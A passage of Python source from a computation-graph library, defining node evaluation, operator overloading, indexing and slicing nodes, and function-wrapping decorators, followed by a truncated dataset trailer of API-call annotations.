            If a node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
name = name or uuid.uuid4().hex
# TODO: Need a way to check if the existing node is not equal to the current ndoe as ewll
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:\n\t"
f"Existing: {self.graph.nodes[name].args}\n\t"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def evaluate_dependencies(self, context, callback=None):
"""
Evaluate the dependencies of this node and discard the values.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
            Callback to be evaluated when a node is evaluated.
"""
for node in self.dependencies:
node.evaluate(context, callback)
def evaluate(self, context, callback=None):
"""
Evaluate the node given a context.
Parameters
----------
context : dict
Normalised context in which to evaluate the node.
callback : callable or None
            Callback to be evaluated when a node is evaluated.
Returns
-------
value : object
Output of the node given the context.
"""
# Evaluate all explicit dependencies first
self.evaluate_dependencies(context, callback)
if self in context:
return context[self]
# Evaluate the parents
partial = functools.partial(self.evaluate_node, context=context, callback=callback)
args = [partial(arg) for arg in self.args]
kwargs = {key: partial(value) for key, value in self.kwargs.items() if key not in self.added_attrs}
# Evaluate the node
callback = callback or _noop_callback
with callback(self, context):
if self.__class__.__name__ == "Node":
context[self] = self.value = self._evaluate(*args, context=context, **kwargs)
else:
context[self] = self.value = self._evaluate(*args, **kwargs)
return self.value
def _evaluate(self, *args, context=None, **kwargs):
"""
Inheriting nodes should implement this function to evaluate the node.
"""
return self(*args, context, **kwargs)
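    # Sketch of how a subclass typically hooks into evaluation (illustrative
    # example, not a class defined in this module): `evaluate` resolves the
    # positional args against the context and hands the concrete values to
    # `_evaluate`.
    #
    #     class add_one(Node):
    #         def _evaluate(self, x, **kwargs):
    #             return x + 1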
@classmethod
def evaluate_node(cls, node, context, **kwargs):
"""
        Evaluate a node or constant given a context.
"""
Node.evaluated_nodes += 1
try:
if isinstance(node, Node):
Node._eval_stack.append(node.name)
return node.evaluate(context, **kwargs)
partial = functools.partial(cls.evaluate_node, context=context, **kwargs)
if isinstance(node, tuple):
return tuple(partial(element) for element in node)
if isinstance(node, list):
return [partial(element) for element in node]
if isinstance(node, dict):
return {partial(key): partial(value) for key, value in node.items()}
if isinstance(node, slice):
return slice(*[partial(getattr(node, attr))
for attr in ['start', 'stop', 'step']])
return node
except Exception as ex: # pragma: no cover
messages = []
interactive = False
if isinstance(node, Node) or not is_iterable(node):
node = [node]
for n in node:
stack = []
if isinstance(n, Node):
for frame in reversed(n._stack): # pylint: disable=protected-access
# Do not capture any internal stack traces
fname = frame.filename
if 'polymath' in fname:
continue
# Stop tracing at the last interactive cell
if interactive and not fname.startswith('<'):
break # pragma: no cover
interactive = fname.startswith('<')
stack.append(frame)
stack = "".join(traceback.format_list(reversed(stack)))
message = "Failed to evaluate node `%s` defined at:\n\n%s" % (n, stack)
messages.append(message)
raise ex from EvaluationError("".join(messages))
@classmethod
def init_from_args(cls, *args,
name=None,
shape=None,
graph=None,
dependencies=None,
op_name=None,
value=None,
**kwargs):
if len(args) == 0:
n = cls(name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
else:
n = cls(*args,
name=name,
shape=shape,
graph=graph,
op_name=op_name,
dependencies=dependencies,
value=value,
**kwargs)
return n
def __bool__(self):
return True
def __hash__(self):
return id(self)
def func_hash(self):
"""
This returns the functional hash of a particular node. The default hash returns an object id, whereas this function
returns a hash of all attributes and subgraphs of a node.
"""
return node_hash(self)
def find_node(self, name):
g = self.graph
while g is not None and name not in g.nodes:
g = g.graph
        if g is not None and name in g.nodes:
return g.nodes[name]
raise RuntimeError(f"Cannot find {name} in graph nodes. Graph: {self.graph}")
def __len__(self):
        # TODO: Update this to check for finalized shape
if self.shape == UNSET_SHAPE:
raise TypeError(f'`shape` must be specified explicitly for nodes {self}')
return self.shape[0]
def __iter__(self):
num = len(self)
for i in range(num):
yield self[i]
def __eq__(self, other):
return hash(self) == hash(other)
def __getattr__(self, name):
return getattr_(self, name, graph=self.graph)
def __getitem__(self, key):
if self.__class__.__name__ != "Node":
if isinstance(key, (slice, Integral)):
return getitem(self, key, graph=self.graph)
else:
if isinstance(key, (list)):
return var_index(self, key, graph=self)
elif isinstance(key, tuple):
return var_index(self, list(key), graph=self)
else:
return var_index(self, [key], graph=self)
else:
return self.nodes[key]
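    # Indexing sketch (hypothetical nodes): for a non-base node `w` with a
    # two-dimensional shape, `w[i, j]` builds a `var_index` over (i, j); on the
    # base graph node itself, `graph["w"]` is a plain name lookup in `self.nodes`.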
def __add__(self, other):
return add(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__radd__(self)
def __radd__(self, other):
return add(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__add__(self)
def __sub__(self, other):
return sub(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rsub__(self)
def __rsub__(self, other):
return sub(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__sub__(self)
def __pow__(self, other):
return pow_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __rpow__(self, other):
return pow_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rpow__(self)
def __matmul__(self, other):
return matmul(self, other, graph=self.graph)
def __rmatmul__(self, other):
return matmul(other, self, graph=self.graph)
def __mul__(self, other):
return mul(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmul__(self)
def __rmul__(self, other):
return mul(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mul__(self)
def __truediv__(self, other):
return truediv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__truediv__(self)
def __rtruediv__(self, other):
return truediv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rtruediv__(self)
def __floordiv__(self, other):
return floordiv(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rfloordiv__(self)
def __rfloordiv__(self, other):
return floordiv(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__floordiv__(self)
def __mod__(self, other):
return mod(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rmod__(self)
def __rmod__(self, other):
return mod(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__mod__(self)
def __lshift__(self, other):
return lshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rlshift__(self)
def __rlshift__(self, other):
return lshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lshift__(self)
def __rshift__(self, other):
return rshift(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rrshift__(self)
def __rrshift__(self, other):
return rshift(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rshift__(self)
def __and__(self, other):
return and_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rand__(self)
def __rand__(self, other):
return and_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__and__(self)
def __or__(self, other):
return or_(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ror__(self)
def __ror__(self, other):
return or_(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__or__(self)
def __xor__(self, other):
return xor(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__rxor__(self)
def __rxor__(self, other):
return xor(other, self, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__xor__(self)
def __lt__(self, other):
return lt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__gt__(self)
def __le__(self, other):
return le(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ge__(self)
def __ne__(self, other):
return ne(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__ne__(self)
def __gt__(self, other):
return gt(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__lt__(self)
def __ge__(self, other):
return ge(self, other, graph=self.graph) if not _is_node_type_instance(other, ("slice_op", "var_index", "index")) else other.__le__(self)
def __invert__(self):
return inv(self, graph=self.graph)
def __neg__(self):
return neg(self, graph=self.graph)
def __abs__(self):
return abs_(self, graph=self.graph)
def __pos__(self):
return pos(self, graph=self.graph)
def __reversed__(self):
return reversed_(self, graph=self.graph)
def update_graph_key(self, old_key, new_key):
n = list(map(lambda k: (new_key, self.nodes[k]) if k == old_key else (k, self.nodes[k]), self.nodes.keys()))
self.nodes = Graph(n)
def insert_node(self, node, idx):
node_list = list(self.nodes.items())
node_list.insert(idx, (node.name, node))
self.nodes = Graph(node_list)
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
class EvaluationError(RuntimeError):
"""
    Failed to evaluate a node.
"""
class var_index(Node): # pylint: disable=C0103,W0223
"""
Node representing values of a variable corresponding to input index values.
Parameters
----------
var : Node
The multi-dimensional variable used for indexing into.
idx : tuple
Tuple of either integer values or index/index_op nodes.
"""
def __init__(self, var, idx, name=None, **kwargs): # pylint: disable=W0235
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
domain = Domain(idx)
super(var_index, self).__init__(var, idx, name=name, domain=domain, **kwargs)
@property
def domain(self):
return self.kwargs["domain"]
@property
def var(self):
var, index_list = self.args
return var
def set_name(self, name):
"""
Set the name for a variable index, making sure to replicate the new name with
        a unique string which corresponds to the variable/index combination.
Parameters
----------
value : str
Unique name of the node.
Returns
-------
self : Node
This node.
Raises
------
ValueError
            If a node with `value` already exists in the associated graph.
KeyError
If the current name of the node cannot be found in the associated graph.
"""
# TODO: Need a way to check if the existing node is not equal to the current ndoe as ewll
if self.graph and name in self.graph.nodes:
raise ValueError(f"duplicate name '{name}' in {self.graph.name}:"
f"Existing: {self.graph.nodes[name].args}\n"
f"New: {self.args}")
if self.graph:
graph = self.graph
if self._name is not None and self._name in graph.nodes:
graph.update_graph_key(self._name, name)
else:
graph.nodes[name] = self
self._name = name
return self
def __getitem__(self, key):
if self.is_shape_finalized() and len(self.nodes) >= np.prod(self.shape):
if isinstance(key, Integral):
key = tuple([key])
idx = np.ravel_multi_index(key, dims=self.shape, order='C')
ret = self.nodes.item_by_index(idx)
return ret
else:
if isinstance(key, (list)):
ret = var_index(self.var, tuple(key), graph=self)
elif isinstance(key, tuple):
ret = var_index(self.var, key, graph=self)
else:
ret = var_index(self.var, tuple([key]), graph=self)
return ret
def is_scalar(self, val=None):
if val is not None and (not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)):
if self.var.shape != DEFAULT_SHAPES[0] and (len(self.var.shape) == 1 and not isinstance(self.var.shape[0],Node)):
raise ValueError(f"Invalid shape var for var index {self} with variable shape {self.var.shape}")
return True
else:
return self.var.shape == DEFAULT_SHAPES[0]
def _evaluate(self, var, indices, **kwargs):
if self.is_scalar(var):
out_shape = (1,)
indices = (0,)
single = True
else:
out_shape = self.domain.shape_from_indices(indices)
indices = self.domain.compute_pairs()
single = False
if isinstance(var, (Integral, Real, str)):
var = np.asarray([var])
elif not isinstance(var, (np.ndarray, list)):
raise TypeError(f"Variable {var} with type {type(var)} is not a list or numpy array, and cannot be sliced for {self.name}")
elif isinstance(var, list):
var = np.asarray(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) == np.prod(out_shape):
if len(out_shape) > len(var.shape):
for i in range(len(out_shape)):
if out_shape[i] == 1:
var = np.expand_dims(var, axis=i)
else:
var = np.squeeze(var)
if len(var.shape) != len(out_shape) and np.prod(var.shape) != np.prod(out_shape):
raise ValueError(f"Index list does not match {var.shape} in {self.var.name} - {self.var.op_name}"
f"dimensions for slice {self.args[0].name} with {out_shape}.\n"
f"Domain: {self.domain}\n"
f"Eval Stack: {Node._eval_stack}")
if not single and not all([(idx_val - 1) >= indices[-1][idx] for idx, idx_val in enumerate(var.shape)]):
raise ValueError(f"var_index {self.name} has indices which are greater than the variable shape:\n"
f"\tArgs: {self.args}\n"
f"\tVar shape: {var.shape}\n"
f"\tNode shape: {self.var.shape}\n"
f"\tIndex Upper bounds: {indices[-1]}")
indices = list(map(lambda x: x.tolist() if isinstance(x, np.ndarray) else x, indices))
res = var[indices] if single else np.asarray([var[idx] for idx in indices]).reshape(out_shape)
if out_shape == (1,) and len(indices) == 1:
res = res[0]
self.domain.set_computed(out_shape, indices)
return res
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
def __le__(self, other):
        return slice_op(operator.le, self, other, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<var_index name=%s, index=%s>" % (self.name, self.args)
class slice_op(Node):
"""
Node representing multi-dimensional operations performed on a node.
Parameters
----------
    target : callable
        The elementwise operation (e.g. operator.add) applied over the combined domain of the operands.
    args : tuple
        Operand nodes or scalar values the operation is applied to.
"""
def __init__(self, target, *args, **kwargs):
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
else:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
if "op_name" in kwargs:
kwargs.pop("op_name")
target_name = f"{target.__module__}.{target.__name__}"
super(slice_op, self).__init__(*args, target=target_name, domain=domain, op_name=f"slice_{target.__name__}", **kwargs)
self.target = target
@property
def domain(self):
return self.kwargs["domain"]
def __getitem__(self, key):
if isinstance(key, (tuple, list, np.ndarray)) and len(key) == 0:
return self
elif self.is_shape_finalized() and len(self.nodes) > 0:
if isinstance(key, (int, Node)):
key = tuple([key])
if len(key) != len(self.shape):
raise KeyError(f"Invalid key shape for {self.name}:\n"
f"Shape: {self.shape}\n"
f"Key: {key}")
name = f"{self.name}{key}"
if name not in self.nodes.keys():
raise KeyError(f"{name} not in {self.name} keys:\n"
f"Node keys: {list(self.nodes.keys())}")
ret = self.nodes[name]
return ret
else:
name = []
if isinstance(key, Node):
name.append(key.name)
elif hasattr(key, "__len__") and not isinstance(key, str):
for k in key:
if isinstance(k, Node):
name.append(k.name)
else:
name.append(str(k))
else:
name.append(key)
name = self.var.name + "[" + "][".join(name) + "]"
if name in self.graph.nodes:
return self.graph.nodes[name]
elif isinstance(key, (list)):
return var_index(self, key, name=name, graph=self.graph)
elif isinstance(key, tuple):
return var_index(self, list(key), name=name, graph=self.graph)
else:
return var_index(self, [key], name=name, graph=self.graph)
def set_shape(self, shape=None, init=False):
s = []
assert isinstance(shape, (tuple, list))
        if all([isinstance(sv, Integral) for sv in shape]) and len(self.domain) == np.prod(shape) and len(shape) > 0:
self._shape = shape if isinstance(shape, tuple) else tuple(shape)
else:
for idx, d in enumerate(self.domain.dom_set):
if shape and isinstance(shape[idx], (func_op, Integral)):
s.append(shape[idx])
elif shape and isinstance(shape[idx], float):
s.append(int(shape[idx]))
elif isinstance(d, float):
s.append(int(d))
elif isinstance(d, var_index):
s.append(d.domain)
else:
s.append(d)
self._shape = tuple(s)
def is_scalar(self, val):
return not isinstance(val, np.ndarray) or (len(val.shape) == 1 and val.shape[0] == 1)
def _evaluate(self, op1, op2, context=None, **kwargs):
if self.is_scalar(op1) or self.is_scalar(op2):
value = self.target(op1, op2)
else:
arg0_dom = self.args[0].domain
arg1_dom = self.args[1].domain
op1_idx = self.domain.map_sub_domain(arg0_dom) if isinstance(self.args[0], Node) else tuple([])
op2_idx = self.domain.map_sub_domain(arg1_dom) if isinstance(self.args[1], Node) else tuple([])
op1 = np.asarray(list(map(lambda x: op1[x], op1_idx))).reshape(self.domain.computed_shape)
op2 = np.asarray(list(map(lambda x: op2[x], op2_idx))).reshape(self.domain.computed_shape)
value = self.target(op1, op2)
return value
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
elif _is_node_type_instance(slice1_var, "index"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
elif _is_node_type_instance(slice2_var, "index"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def __add__(self, other):
return slice_op(operator.add, self, other, graph=self.graph)
def __radd__(self, other):
return slice_op(operator.add, other, self, graph=self.graph)
def __sub__(self, other):
return slice_op(operator.sub, self, other, graph=self.graph)
def __rsub__(self, other):
return slice_op(operator.sub, other, self, graph=self.graph)
def __pow__(self, other):
return slice_op(builtins.pow, self, other, graph=self.graph)
def __rpow__(self, other):
return slice_op(builtins.pow, other, self, graph=self.graph)
def __mul__(self, other):
return slice_op(operator.mul, self, other, graph=self.graph)
def __rmul__(self, other):
return slice_op(operator.mul, other, self, graph=self.graph)
def __truediv__(self, other):
return slice_op(operator.truediv, self, other, graph=self.graph)
def __rtruediv__(self, other):
return slice_op(operator.truediv, other, self, graph=self.graph)
def __floordiv__(self, other):
return slice_op(operator.floordiv, self, other, graph=self.graph)
def __rfloordiv__(self, other):
return slice_op(operator.floordiv, other, self, graph=self.graph)
def __mod__(self, other):
return slice_op(operator.mod, self, other, graph=self.graph)
def __rmod__(self, other):
return slice_op(operator.mod, other, self, graph=self.graph)
def __lshift__(self, other):
return slice_op(operator.lshift, self, other, graph=self.graph)
def __rlshift__(self, other):
return slice_op(operator.lshift, other, self, graph=self.graph)
def __rshift__(self, other):
return slice_op(operator.rshift, self, other, graph=self.graph)
def __rrshift__(self, other):
return slice_op(operator.rshift, other, self, graph=self.graph)
def __and__(self, other):
return slice_op(operator.and_, self, other, graph=self.graph)
def __rand__(self, other):
return slice_op(operator.and_, other, self, graph=self.graph)
def __or__(self, other):
return slice_op(operator.or_, self, other, graph=self.graph)
def __ror__(self, other):
return slice_op(operator.or_, other, self, graph=self.graph)
def __xor__(self, other):
return slice_op(operator.xor, self, other, graph=self.graph)
def __rxor__(self, other):
return slice_op(operator.xor, other, self, graph=self.graph)
def __lt__(self, other):
return slice_op(operator.lt, self, other, graph=self.graph)
    def __le__(self, other):
        return slice_op(operator.le, self, other, graph=self.graph)
def __ne__(self, other):
return slice_op(operator.ne, self, other, graph=self.graph)
def __gt__(self, other):
return slice_op(operator.gt, self, other, graph=self.graph)
def __ge__(self, other):
return slice_op(operator.ge, self, other, graph=self.graph)
def __repr__(self):
return "<slice_%s '%s'>" % (self.target.__name__, self.name)
class func_op(Node): # pylint: disable=C0103,R0903
"""
Node wrapper for stateless functions.
Parameters
----------
target : callable
function to evaluate the node
args : tuple
positional arguments passed to the target
kwargs : dict
        keyword arguments passed to the target
"""
def __init__(self, target, *args, **kwargs):
kwargs["op_name"] = kwargs["op_name"] if "op_name" in kwargs \
else f"{target.__name__}"
if "domain" in kwargs:
domain = tuple(kwargs.pop("domain")) if isinstance(kwargs["domain"], list) else kwargs.pop("domain")
elif len(args) == 2:
all_args = _flatten_iterable(args)
slice1_var, slice1_idx, slice2_var, slice2_idx = self.get_index_nodes(all_args[0], all_args[1])
domain = slice1_idx.combine_set_domains(slice2_idx)
else:
domain = Domain(tuple([]))
self._target = None
super(func_op, self).__init__(*args, target=f"{target.__module__}.{target.__name__}", domain=domain, **kwargs)
self.target = target
self.added_attrs += ["domain", "target"]
@property
def target(self):
return self._target
@target.setter
def target(self, fnc):
self._target = fnc
self.op_name = f"{fnc.__name__}"
self.kwargs["target"] = f"{fnc.__module__}.{fnc.__name__}"
def __getitem__(self, key):
return self
@property
def domain(self):
return self.kwargs["domain"]
def get_index_nodes(self, slice1_var=None, slice2_var=None):
if slice1_var is None and slice2_var is None:
slice1_var, slice2_var = self.args
if isinstance(slice1_var, (slice_op, var_index)) or _is_node_type_instance(slice1_var, "GroupNode"):
slice1_idx = slice1_var.domain
else:
slice1_idx = Domain(tuple([]))
if isinstance(slice2_var, (slice_op, var_index)) or _is_node_type_instance(slice2_var, "GroupNode"):
slice2_idx = slice2_var.domain
else:
slice2_idx = Domain(tuple([]))
return slice1_var, slice1_idx, slice2_var, slice2_idx
def _evaluate(self, *args, **kwargs):
for aa in list(kwargs.keys()):
if aa in self.added_attrs:
kwargs.pop(aa)
return self.target(*args, **kwargs)
def __call__(self, *args, **kwargs):
return call(self, *args, **kwargs)
def __repr__(self):
return "<func_op '%s' target=%s args=<%d items>>" % \
(self.name, self.kwargs["target"], len(self.args))
def nodeop(target=None, **kwargs):
"""
Decorator for creating nodes from functions.
"""
# This is called when the decorator is used with arguments
if target is None:
return functools.partial(nodeop, **kwargs)
    # Otherwise wrap the target so that calling it builds a func_op node instead of executing it
@functools.wraps(target)
def _wrapper(*args, **kwargs_inner):
return func_op(target, *args, **kwargs_inner, **kwargs)
return _wrapper
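# Hypothetical usage sketch (added for illustration): decorating a plain function
# turns calls to it into lazily evaluated func_op nodes instead of executing it
# immediately.
#
#     @nodeop
#     def add_one(x):
#         return x + 1
#
#     node = add_one(41)  # a func_op node; evaluation happens when the graph runs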
@nodeop
def call(func, *args, **kwargs):
"""
Call `func` with positional arguments `args` and keyword arguments `kwargs`.
Parameters
----------
func : callable
Function to call when the node is executed.
args : list
Sequence of positional arguments passed to `func`.
kwargs : dict
Mapping of keyword arguments passed to `func`.
"""
return func(*args, **kwargs)
@contextlib.contextmanager
def control_dependencies(dependencies, graph=None):
"""
Ensure that all `dependencies` are executed before any nodes in this scope.
Parameters
----------
dependencies : list
Sequence of nodes to be evaluted before evaluating any nodes defined in this
scope.
"""
# Add dependencies to the graph
graph = Node.get_active_graph(graph)
graph.dependencies.extend(dependencies)
yield
# Remove dependencies from the graph
del graph.dependencies[-len(dependencies):]
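# Hypothetical usage sketch (added for illustration), where `setup_node` and
# `compute_node` stand for nodes created elsewhere:
#
#     with control_dependencies([setup_node]):
#         result = compute_node(...)  # evaluated only after setup_node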
#pylint: disable=C0103
abs_ = nodeop(builtins.abs)
dict_ = nodeop(builtins.dict)
help_ = nodeop(builtins.help)
min_ = nodeop(builtins.min)
setattr_ = nodeop(builtins.setattr)
all_ = nodeop(builtins.all)
dir_ = nodeop(builtins.dir)
hex_ = nodeop(builtins.hex)
next_ = nodeop(builtins.next)
slice_ = nodeop(builtins.slice)
any_ = nodeop(builtins.any)
divmod_ = nodeop(builtins.divmod)
id_ = nodeop(builtins.id)
object_ = nodeop(builtins.object)
sorted_ = nodeop(builtins.sorted)
ascii_ = nodeop(builtins.ascii)
enumerate_ = nodeop(builtins.enumerate)
input_ = nodeop(builtins.input)
oct_ = nodeop(builtins.oct)
staticmethod_ = nodeop(builtins.staticmethod)
bin_ = nodeop(builtins.bin)
eval_ = nodeop(builtins.eval)
int_ = nodeop(builtins.int)
open_ = nodeop(builtins.open)
str_ = nodeop(builtins.str)
bool_ = nodeop(builtins.bool)
exec_ = nodeop(builtins.exec)
isinstance_ = nodeop(builtins.isinstance)
ord_ = nodeop(builtins.ord)
sum_ = nodeop(builtins.sum)
bytearray_ = nodeop(builtins.bytearray)
filter_ = nodeop(builtins.filter)
issubclass_ = nodeop(builtins.issubclass)
pow_ = nodeop(builtins.pow)
super_ = nodeop(builtins.super)
bytes_ = nodeop(builtins.bytes)
float_ = nodeop(builtins.float)
iter_ = nodeop(builtins.iter)
print_ = nodeop(builtins.print)
tuple_ = nodeop(builtins.tuple)
callable_ = nodeop(builtins.callable)
format_ = nodeop(builtins.format)
len_ = nodeop(builtins.len)
property_ = nodeop(builtins.property)
type_ = nodeop(builtins.type)
chr_ = nodeop(builtins.chr)
frozenset_ = nodeop(builtins.frozenset)
list_ = nodeop(builtins.list)
range_ = nodeop(builtins.range)
vars_ = nodeop(builtins.vars)
classmethod_ = nodeop(builtins.classmethod)
getattr_ = nodeop(builtins.getattr)
locals_ = nodeop(builtins.locals)
repr_ = nodeop(builtins.repr)
zip_ = nodeop(builtins.zip)
compile_ = nodeop(builtins.compile)
globals_ = nodeop(builtins.globals)
map_ = nodeop(builtins.map)
reversed_ = nodeop(builtins.reversed)
complex_ = nodeop(builtins.complex)
hasattr_ = nodeop(builtins.hasattr)
max_ = nodeop(builtins.max)
round_ = nodeop(builtins.round)
delattr_ = nodeop(builtins.delattr)
hash_ = nodeop(builtins.hash)
memoryview_ = nodeop(builtins.memoryview)
set_ = nodeop(builtins.set)
add = nodeop(operator.add)
and_ = nodeop(operator.and_)
attrgetter = nodeop(operator.attrgetter)
concat = nodeop(operator.concat)
contains = nodeop(operator.contains)
countOf = nodeop(operator.countOf)
delitem = nodeop(operator.delitem)
eq = nodeop(operator.eq)
floordiv = nodeop(operator.floordiv)
ge = nodeop(operator.ge)
getitem = nodeop(operator.getitem)
gt = nodeop(operator.gt)
index = nodeop(operator.index)
indexOf = nodeop(operator.indexOf)
inv = nodeop(operator.inv)
invert = nodeop(operator.invert)
ior = nodeop(operator.ior)
ipow = nodeop(operator.ipow)
irshift = nodeop(operator.irshift)
is_ = nodeop(operator.is_)
is_not = nodeop(operator.is_not)
itemgetter = nodeop(operator.itemgetter)
le = nodeop(operator.le)
length_hint = nodeop(operator.length_hint)
lshift = nodeop(operator.lshift)
lt = nodeop(operator.lt)
matmul = nodeop(operator.matmul)
methodcaller = nodeop(operator.methodcaller)
mod = nodeop(operator.mod)
mul = nodeop(operator.mul)
ne = nodeop(operator.ne)
neg = nodeop(operator.neg)
not_ = nodeop(operator.not_)
or_ = nodeop(operator.or_)
pos = nodeop(operator.pos)
rshift = nodeop(operator.rshift)
setitem = nodeop(operator.setitem)
sub = nodeop(operator.sub)
truediv = nodeop(operator.truediv)
truth = nodeop(operator.truth)
xor = nodeop(operator.xor)
import_ = nodeop(importlib.import_module)
| [
"numpy.product",
"numpy.prod",
"collections.OrderedDict",
"collections.deque",
"traceback.extract_stack",
"numpy.ravel_multi_index",
"numpy.asarray",
"functools.wraps",
"uuid.uuid4",
"numpy.squeeze",
"functools.partial",
"numpy.expand_dims",
"numpy.int"
] | [((1238, 1251), 'collections.deque', 'deque', (['[None]'], {}), '([None])\n', (1243, 1251), False, 'from collections import OrderedDict, Mapping, Sequence, deque\n'), ((46542, 46565), 'functools.wraps', 'functools.wraps', (['target'], {}), '(target)\n', (46557, 46565), False, 'import functools\n'), ((1981, 1994), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1992, 1994), False, 'from collections import OrderedDict, Mapping, Sequence, deque\n'), ((2554, 2586), 'traceback.extract_stack', 'traceback.extract_stack', ([], {'limit': '(1)'}), '(limit=1)\n', (2577, 2586), False, 'import traceback\n'), ((14781, 14854), 'functools.partial', 'functools.partial', (['self.evaluate_node'], {'context': 'context', 'callback': 'callback'}), '(self.evaluate_node, context=context, callback=callback)\n', (14798, 14854), False, 'import functools\n'), ((46434, 46469), 'functools.partial', 'functools.partial', (['nodeop'], {}), '(nodeop, **kwargs)\n', (46451, 46469), False, 'import functools\n'), ((15961, 16024), 'functools.partial', 'functools.partial', (['cls.evaluate_node'], {'context': 'context'}), 